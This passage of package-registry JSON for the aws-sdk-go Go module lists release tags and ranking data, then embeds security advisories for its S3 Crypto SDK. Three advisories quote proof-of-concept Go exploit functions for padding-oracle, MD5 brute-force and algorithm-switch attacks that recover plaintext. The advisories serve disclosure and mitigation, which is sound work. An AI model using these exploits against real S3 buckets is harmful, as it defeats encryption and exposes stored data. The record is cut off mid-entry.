:"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v1.0.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v1.0.0"},{"name":"v0.10.4","sha":"c3505486c9bc67389575587c2154500864883384","kind":"commit","published_at":"2015-11-12T22:32:09.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.10.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.10.4"},{"name":"v0.10.3","sha":"0d69769150f236a0fee9a372c2faee638f57bba4","kind":"commit","published_at":"2015-11-10T22:42:33.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.10.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.10.3"},{"name":"v0.10.2","sha":"aed0bed4103ed45330f4d116eeb73c88310f5b75","kind":"commit","published_at":"2015-11-03T20:00:30.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.10.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.10.2"},{"name":"v0.10.1","sha":"99e1b7ffaa0cea584f0cb8c60eef52fdfe25555b","kind":"commit","published_at":"2015-11-02T20:50:48.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.10.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.10.1"},{"name":"vrelease-v0.10.0","sha":"fd136b7571693211815b5c780eebcb52c37a1b46","kind":"commit","published_at":"2015-10-29T22:42:06.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/vrelease-v0.10.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/vrelease-v0.10.0"},{"name":"v0.10.0","sha":"fd136b7571693211815b5c780eebcb52c37a1b46","kind":"commit","published_at":"2015-10-29T22:42:06.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.10.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.10.0"},{"name":"v0.9.17","sha":"1481c919816453abc15fbe2cd6e071dfc2f188a0","kind":"commit","published_at":"2015-10-26T18:11:40.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.17","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.17"},{"name":"v0.9.16","sha":"fc978aa948864af5b38d2912da12fae703b001b2","kind":"commit","published_at":"2015-10-22T23:39:59.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.16","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.16"},{"name":"v0.9.15","sha":"7ab6754ddaaa7972ac1c896ddd7f796cc726e79d","kind":"commit","published_at":"2015-10-15T21:37:44.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.15","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.15"},{"name":"v0.9.14","sha":"6bb00dc3527e8a08fc06588b92429c54de709d63","kind":"commit","published_at":"2015-10-08T17:24:10.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.14","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.14"},{"name":"v0.9.13","sha":"f28e73d4791500a90d49190e0a01b769748cc2a8","kind":"commit","published_at":"2015-10-07T16:09:04.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.13","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.13"},{"name":"v0.9.12","sha":"f4214c63ee22e750e70e68ab0f2221f676208ce6","kind":"commit","published_at":"2015-10-06T19:34:27.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.12","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.12"},{"name":"v0.9.11","sha":"890e878e1bf2abba2e0c33e494daf3ca55b2e563","kind":"commit","published_at":"2015-10-01T21:26:57.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.11","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.11"},{"name":"v0.9.10","sha":"661aeb3339ad9bd5fd420752ebf18a651d40413e","kind":"commit","published_at":"2015-09-29T23:31:42.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.10","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.10"},{"name":"v0.9.9","sha":"c4ae871ffc03691a7b039fa751a1e7afee56e920","kind":"commit","published_at":"2015-09-17T20:03:02.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.9","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.9"},{"name":"v0.9.8","sha":"efe00a0b2363036d4efa6a83c17a88334e0f3a3b","kind":"commit","published_at":"2015-09-16T19:27:19.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.8","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.8"},{"name":"v0.9.7","sha":"df31ba5c1c80d1ceffb79b5e0dcc0baf60c3bf1b","kind":"commit","published_at":"2015-09-15T20:12:48.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.7","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.7"},{"name":"v0.9.6","sha":"69142c71761512d894b028dc5c8cc312758372dd","kind":"commit","published_at":"2015-09-10T18:49:37.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.6","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.6"},{"name":"v0.9.5","sha":"f096b7d61df3d7d6d97f0e701f92616d1ea5420d","kind":"commit","published_at":"2015-09-03T21:40:20.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.5"},{"name":"v0.9.4rc5","sha":"5c0313fff8cd85670ae4fc996254dd7d66cb4cf7","kind":"commit","published_at":"2015-08-31T20:20:52.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.4rc5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.4rc5"},{"name":"v0.9.3rc4","sha":"8e2b65e861d9dece1929689b10ae8cabf4227601","kind":"commit","published_at":"2015-08-27T20:57:54.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.3rc4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.3rc4"},{"name":"v0.9.2rc3","sha":"1dc63737201ce6f6fb46c49c259cf2147cc67891","kind":"commit","published_at":"2015-08-25T20:21:44.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.2rc3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.2rc3"},{"name":"v0.9.1rc2","sha":"a11ddd7a070196035bc94b6c04a2a0114c06a395","kind":"commit","published_at":"2015-08-20T19:44:31.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.1rc2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.1rc2"},{"name":"v0.9.0rc1","sha":"9ab3fe0b715401c3f00f818aae3e97c1f17bc4c8","kind":"commit","published_at":"2015-08-17T17:39:54.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.9.0rc1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.9.0rc1"},{"name":"v0.7.4","sha":"26610c929a183317d5bfa24af9a4c5484bc50fc8","kind":"commit","published_at":"2015-08-12T19:05:56.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.7.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.7.4"},{"name":"v0.7.3","sha":"bed164a424e75154a40550c04c313ef51a7bb275","kind":"commit","published_at":"2015-08-06T17:16:05.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.7.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.7.3"},{"name":"v0.7.2","sha":"bc51d580d7481037e80ab618ea538869a8ade84c","kind":"commit","published_at":"2015-08-04T19:32:48.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.7.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.7.2"},{"name":"v0.7.1","sha":"7912533640acfeb64f74f65e7bb71397c97cf952","kind":"commit","published_at":"2015-07-30T18:46:46.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.7.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.7.1"},{"name":"v0.7.0","sha":"67dc9f948602be9f85cb640f89b0adec994ccbda","kind":"commit","published_at":"2015-07-28T19:06:58.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.7.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.7.0"},{"name":"v0.6.8","sha":"834ef89b4cf046a8e47cd0244e38e829b0cf7ef4","kind":"commit","published_at":"2015-07-23T19:14:02.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.8","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.8"},{"name":"v0.6.7","sha":"25022a98a021a1110f362b1c0c728eef7ec96e23","kind":"commit","published_at":"2015-07-14T20:35:50.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.7","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.7"},{"name":"v0.6.6","sha":"2aabe844100c73b778f0c51d4318e7ea4ab26bde","kind":"commit","published_at":"2015-07-09T07:40:29.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.6","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.6"},{"name":"v0.6.5","sha":"8b15d2217025f7d51ae34b88497232d3b6cfca81","kind":"commit","published_at":"2015-07-07T18:32:04.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.5","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.5"},{"name":"v0.6.4","sha":"f4e37011d81e59702c156b071449ec16b37abcae","kind":"commit","published_at":"2015-06-24T19:44:06.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.4","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.4"},{"name":"v0.6.3","sha":"912c4af1b7e1dd2f8735668df44b2750c552c07b","kind":"commit","published_at":"2015-06-18T19:17:13.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.3","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.3"},{"name":"v0.6.2","sha":"b9974fd5432b1f984d0eddce92a32c3d67237ef5","kind":"commit","published_at":"2015-06-11T21:25:29.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.2","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.2"},{"name":"v0.6.1","sha":"dce27ccda4fe5a301e770e7c955bc457776f21f1","kind":"commit","published_at":"2015-06-04T19:57:25.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.1","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.1"},{"name":"v0.6.0","sha":"ea83c25c44525da47e8044bbd21e4045758ea39b","kind":"commit","published_at":"2015-06-03T17:07:40.000Z","download_url":"https://codeload.github.com/aws/aws-sdk-go/tar.gz/v0.6.0","html_url":"https://github.com/aws/aws-sdk-go/releases/tag/v0.6.0"}]},"repo_metadata_updated_at":"2023-03-21T18:38:01.223Z","dependent_packages_count":30272,"downloads":null,"downloads_period":null,"dependent_repos_count":69623,"rankings":{"downloads":null,"dependent_repos_count":0.01829100370341446,"dependent_packages_count":0.006987574448495411,"stargazers_count":0.7149932795975157,"forks_count":0.5297197982646153,"docker_downloads_count":0.008837226508391255,"average":0.2557657765044864},"purl":"pkg:golang/github.com/aws/aws-sdk-go","advisories":[{"uuid":"GSA_kwCzR0hTQS02anZjLXEyeDctcGNods4AAwom","url":"https://github.com/advisories/GHSA-6jvc-q2x7-pchv","title":"AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field","description":"The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext, if the hash is readable to the attacker. AWS now blocks this metadata field, but older SDK versions still send it.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-12-28T00:30:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-2582","https://github.com/aws/aws-sdk-go/commit/35fa6ddf45c061e0f08d3a3b5119f8f4da38f6d1","https://pkg.go.dev/vuln/GO-2022-0391","https://github.com/advisories/GHSA-6jvc-q2x7-pchv"],"source_kind":"github","identifiers":["GHSA-6jvc-q2x7-pchv","CVE-2022-2582"],"repository_url":"https://github.com/aws/aws-sdk-go","blast_radius":20.8238367508558,"packages":[{"versions":[{"first_patched_version":"1.34.0","vulnerable_version_range":"\u003c 1.34.0"}],"ecosystem":"go","package_name":"github.com/aws/aws-sdk-go"}],"created_at":"2022-12-30T19:03:06.863Z","updated_at":"2023-07-05T23:00:26.000Z","epss_percentage":0.00054,"epss_percentile":0.245},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWY1cGctN3dmdy04NHE5","url":"https://github.com/advisories/GHSA-f5pg-7wfw-84q9","title":"CBC padding oracle issue in AWS S3 Crypto SDK for golang","description":"### Summary\n\nThe golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher.\n\n### Risk/Severity\n\nThe vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.\n\n### Impact\n\nThis advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non \"strict\" versions of C++ and Java S3 Crypto SDKs being present as well.\n\nV1 prior to 1.34.0 of the S3 crypto SDK, allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912.\n\nThis exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) `128*length(plaintext)` queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors.\n\nThis issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM.\n\n### Mitigation\n\nUsing the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode.\n\n### Proof of concept\n\nA [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository.\n\nThis particular issue is described in [padding_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/padding_oracle_exploit.go):\n\n```golang\nfunc PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {\n\tdata, header, err := input.S3Mock.GetObjectDirect(bucket, key)\n\tif alg := header.Get(\"X-Amz-Meta-X-Amz-Cek-Alg\"); alg != \"AES/CBC/PKCS5Padding\" {\n\t\treturn \"\", fmt.Errorf(\"Algorithm is %q, not CBC!\", alg)\n\t}\n\tlength, err := strconv.Atoi(header.Get(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Length\"))\n\tpadding := byte(len(data) - length)\n\tplaintext := make([]byte, length)\n\tfor i := length - 1; i \u003e= 0; i-- {\n\t\tnewLength := 16 * (i/16 + 1)\n\t\tdataCopy := make([]byte, newLength)\n\t\theaderCopy := header.Clone()\n\t\tcopy(dataCopy, data)\n\t\t// Set Padding\n\t\tnewPadding := byte(newLength - i)\n\t\tfor j := i + 1; j \u003c newLength; j++ {\n\t\t\tvar oldValue byte\n\t\t\tif j \u003e= length {\n\t\t\t\toldValue = padding\n\t\t\t} else {\n\t\t\t\toldValue = plaintext[j]\n\t\t\t}\n\t\t\tdataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\t\t}\n\t\t// Guess\n\t\tfor c := 0; c \u003c 256; c++ {\n\t\t\tdataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy)\n\t\t\tinput.S3Mock.PutObjectDirect(bucket, key+\"guess\", dataCopy, headerCopy)\n\t\t\tif input.Oracle(bucket, key+\"guess\") {\n\t\t\t\tplaintext[i] = byte(c)\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tdataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy)\n\t\t}\n\t}\n\treturn string(plaintext), nil\n}\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-11T23:26:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.6,"cvss_vector":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9","https://nvd.nist.gov/vuln/detail/CVE-2020-8911","https://github.com/aws/aws-sdk-go/pull/3403","https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e","https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4","https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09","https://bugzilla.redhat.com/show_bug.cgi?id=1869800","https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc","https://pkg.go.dev/vuln/GO-2022-0646","https://github.com/advisories/GHSA-f5pg-7wfw-84q9"],"source_kind":"github","identifiers":["GHSA-f5pg-7wfw-84q9","CVE-2020-8911"],"repository_url":"https://github.com/aws/aws-sdk-go","blast_radius":27.119415303440114,"packages":[{"versions":[{"first_patched_version":"1.34.0","vulnerable_version_range":"\u003c 1.34.0"}],"ecosystem":"go","package_name":"github.com/aws/aws-sdk-go"}],"created_at":"2022-12-21T16:13:00.861Z","updated_at":"2025-02-14T01:09:11.181Z","epss_percentage":0.00048,"epss_percentile":0.20511},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTc2d2YtOXZncC1wajd3","url":"https://github.com/advisories/GHSA-76wf-9vgp-pj7w","title":"Unencrypted md5 plaintext hash in metadata in AWS S3 Crypto SDK for golang","description":"### Summary\n\nThe golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.\n\n### Specific Go Packages Affected\ngithub.com/aws/aws-sdk-go/service/s3/s3crypto\n\n### Risk/Severity\n\nThe vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.\n\n### Impact\n\nThe issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.\n\nThe S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.\n\nThe issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.\n\n### Mitigation\n\nThe header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.\n\n### Proof of concept\n\nA [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository, this particular issue can be found at [here](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/hash_exploit.go):\n\n```golang\nfunc HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {\n\t_, header, err := input.S3Mock.GetObjectDirect(bucket, key)\n\tlength, err := strconv.Atoi(header.Get(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Length\"))\n\tplaintextMd5 := header.Get(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Md5\")\n\tblocks := length / 16\n\tpossiblePlaintextNum := 1\n\tsegNum := len(input.PossiblePlaintextSegments)\n\tfor i := 0; i \u003c blocks; i++ {\n\t\tpossiblePlaintextNum *= segNum\n\t}\n\tfor i := 0; i \u003c possiblePlaintextNum; i++ {\n\t\tw := i\n\t\tguess := \"\"\n\t\tfor j := 0; j \u003c blocks; j++ {\n\t\t\tguess += input.PossiblePlaintextSegments[w%segNum]\n\t\t\tw /= segNum\n\t\t}\n\t\tguessMd5 := md5.Sum([]byte(guess))\n\t\tif plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {\n\t\t\treturn guess, nil\n\t\t}\n\t}\n\treturn \"\", fmt.Errorf(\"No plaintext found!\")\n}\n```\n\nThe PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-11T23:26:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/google/security-research/security/advisories/GHSA-76wf-9vgp-pj7w","https://github.com/aws/aws-sdk-go/commit/35fa6ddf45c061e0f08d3a3b5119f8f4da38f6d1","https://pkg.go.dev/vuln/GO-2022-0391","https://github.com/advisories/GHSA-76wf-9vgp-pj7w"],"source_kind":"github","identifiers":["GHSA-76wf-9vgp-pj7w"],"repository_url":"https://github.com/aws/aws-sdk-go","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"1.34.0","vulnerable_version_range":"\u003c 1.34.0"}],"ecosystem":"go","package_name":"github.com/aws/aws-sdk-go"}],"created_at":"2022-12-21T16:12:35.896Z","updated_at":"2023-10-02T16:21:14.000Z","epss_percentage":null,"epss_percentile":null},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdmMzMtZjRmNS14d2d3","url":"https://github.com/advisories/GHSA-7f33-f4f5-xwgw","title":"In-band key negotiation issue in AWS S3 Crypto SDK for golang","description":"### Summary\n\nThe golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the GCM option was chosen as content cipher.\n\n### Risk/Severity\n\nThe vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data.\n\n### Impact\n\nThis advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non \"strict\" versions of C++ and Java S3 Crypto SDKs being present as well.\n\nV1 prior to 1.34.0 of the S3 crypto SDK does not authenticate the algorithm parameters for the data encryption key.\n\nAn attacker with write access to the bucket can use this in order to change the encryption algorithm of an object in the bucket, which can lead to problems depending on the supported algorithms. For example, a switch from AES-GCM to AES-CTR in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation.\n\nBy default, the only available algorithms in the SDK are AES-GCM and AES-CBC. Switching the algorithm from AES-GCM to AES-CBC can be used as way to reconstruct the plaintext through an oracle endpoint revealing decryption failures, by brute forcing 16 byte chunks of the plaintext. Note that the plaintext needs to have some known structure for this to work, as a uniform random 16 byte string would be the same as a 128 bit encryption key, which is considered cryptographically safe.\n\nThe attack works by taking a 16 byte AES-GCM encrypted block guessing 16 bytes of plaintext, constructing forgery that pretends to be PKCS5 padded AES-CBC, using the ciphertext and the plaintext guess and that will decrypt to a valid message if the guess was correct.\n\nTo understand this attack, we have to take a closer look at both AES-GCM and AES-CBC:\nAES-GCM encrypts using a variant of CTR mode, i.e. `C_i = AES-Enc(CB_i) ^ M_i`. AES-CBC on the other hand *decrypts* via `M_i = AES-Dec(C_i) ^ C_{i-1}`, where `C_{-1} = IV`. The padding oracle can tell us if, after switching to CBC mode, the plaintext recovered is padded with a valid PKCS5 padding.\n\nSince `AES-Dec(C_i ^ M_i) = CB_i`, if we set `IV' = CB_i ^ 0x10*[16]`, where `0x10*[16]` is the byte `0x10` repeated 16 times, and `C_0' = C_i ^ M_i'` the resulting one block message `(IV', C_0')` will have valid PKCS5 padding if our guess `M_i'` for `M_i` was correct, since the decrypted message consists of 16 bytes of value `0x10`, the PKCS5 padded empty string.\n\nNote however, that an incorrect guess might also result in a valid padding, if the AES decryption result randomly happens to end in `0x01`, `0x0202`, or a longer valid padding. In order to ensure that the guess was indeed correct, a second check using `IV'' = IV' ^ (0x00*[15] || 0x11)` with the same ciphertext block has to be performed. This will decrypt to 15 bytes of value `0x10` and one byte of value `0x01` if our initial guess was correct, producing a valid padding. On an incorrect guess, this second ciphertext forgery will have an invalid padding with a probability of 1:2^128, as one can easily see.\n\nThis issue is fixed in V2 of the API, by using the `KMS+context` key wrapping scheme for new files, authenticating the algorithm. Old files encrypted with the `KMS` key wrapping scheme remain vulnerable until they are reencrypted with the new scheme.\n\n### Mitigation\n\nUsing the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with GCM mode and use the `KMS` key wrapping option.\n\n### Proof of concept\n\nA [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository.\n\nThis particular issue is described in [combined_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/combined_oracle_exploit.go):\n\n```golang\nfunc CombinedOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {\n\tdata, header, err := input.S3Mock.GetObjectDirect(bucket, key)\n\tif alg := header.Get(\"X-Amz-Meta-X-Amz-Cek-Alg\"); alg != \"AES/GCM/NoPadding\" {\n\t\treturn \"\", fmt.Errorf(\"Algorithm is %q, not GCM!\", alg)\n\t}\n\tgcmIv, err := base64.StdEncoding.DecodeString(header.Get(\"X-Amz-Meta-X-Amz-Iv\"))\n\tif len(gcmIv) != 12 {\n\t\treturn \"\", fmt.Errorf(\"GCM IV is %d bytes, not 12\", len(gcmIv))\n\t}\n\tfullIv := make([]byte, 16)\n\tconfirmIv := make([]byte, 16)\n\tfor i := 0; i \u003c 12; i++ {\n\t\tfullIv[i] = gcmIv[i] ^ 0x10\n\t\tconfirmIv[i] = gcmIv[i] ^ 0x10\n\t}\n        // Set i to the block we want to attempt to decrypt\n\tcounter := i + 2\n\tfor j := 15; j \u003e= 12; j-- {\n\t\tv := byte(counter % 256)\n\t\tfullIv[j] = 0x10 ^ v\n\t\tconfirmIv[j] = 0x10 ^ v\n\t\tcounter /= 256\n\t}\n\tconfirmIv[15] ^= 0x11\n\tfullIvEnc := base64.StdEncoding.EncodeToString(fullIv)\n\tconfirmIvEnc := base64.StdEncoding.EncodeToString(confirmIv)\n\tsuccess := false\n        // Set plaintextGuess to the guess for the plaintext of this block\n\tnewData := []byte(plaintextGuess)\n\tfor j := 0; j \u003c 16; j++ {\n\t\tnewData[j] ^= data[16*i+j]\n\t}\n\tnewHeader := header.Clone()\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Cek-Alg\", \"AES/CBC/PKCS5Padding\")\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Iv\", fullIvEnc)\n\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Length\", \"16\")\n\tinput.S3Mock.PutObjectDirect(bucket, key+\"guess\", newData, newHeader)\n\tif input.Oracle(bucket, key+\"guess\") {\n\t\tnewHeader.Set(\"X-Amz-Meta-X-Amz-Iv\", confirmIvEnc)\n\t\tinput.S3Mock.PutObjectDirect(bucket, key+\"guess\", newData, newHeader)\n\t\tif input.Oracle(bucket, key+\"guess\") {\n\t\t\treturn plaintextGuess, nil\n\t\t}\n\t}\n\treturn \"\", fmt.Errorf(\"Block %d could not be decrypted\", i)\n}\n```","origin":"UNSPECIFIED","severity":"LOW","published_at":"2022-02-11T23:23:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":2.5,"cvss_vector":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw","https://nvd.nist.gov/vuln/detail/CVE-2020-8912","https://github.com/aws/aws-sdk-go/pull/3403","https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e","https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4","https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09","https://bugzilla.redhat.com/show_bug.cgi?id=1869801","https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc","https://pkg.go.dev/vuln/GO-2022-0646","https://github.com/advisories/GHSA-7f33-f4f5-xwgw"],"source_kind":"github","identifiers":["GHSA-7f33-f4f5-xwgw","CVE-2020-8912"],"repository_url":"https://github.com/aws/aws-sdk-go","blast_radius":12.106881831892908,"packages":[{"versions":[{"first_patched_version":"1.34.0","vulnerable_version_range":"\u003c 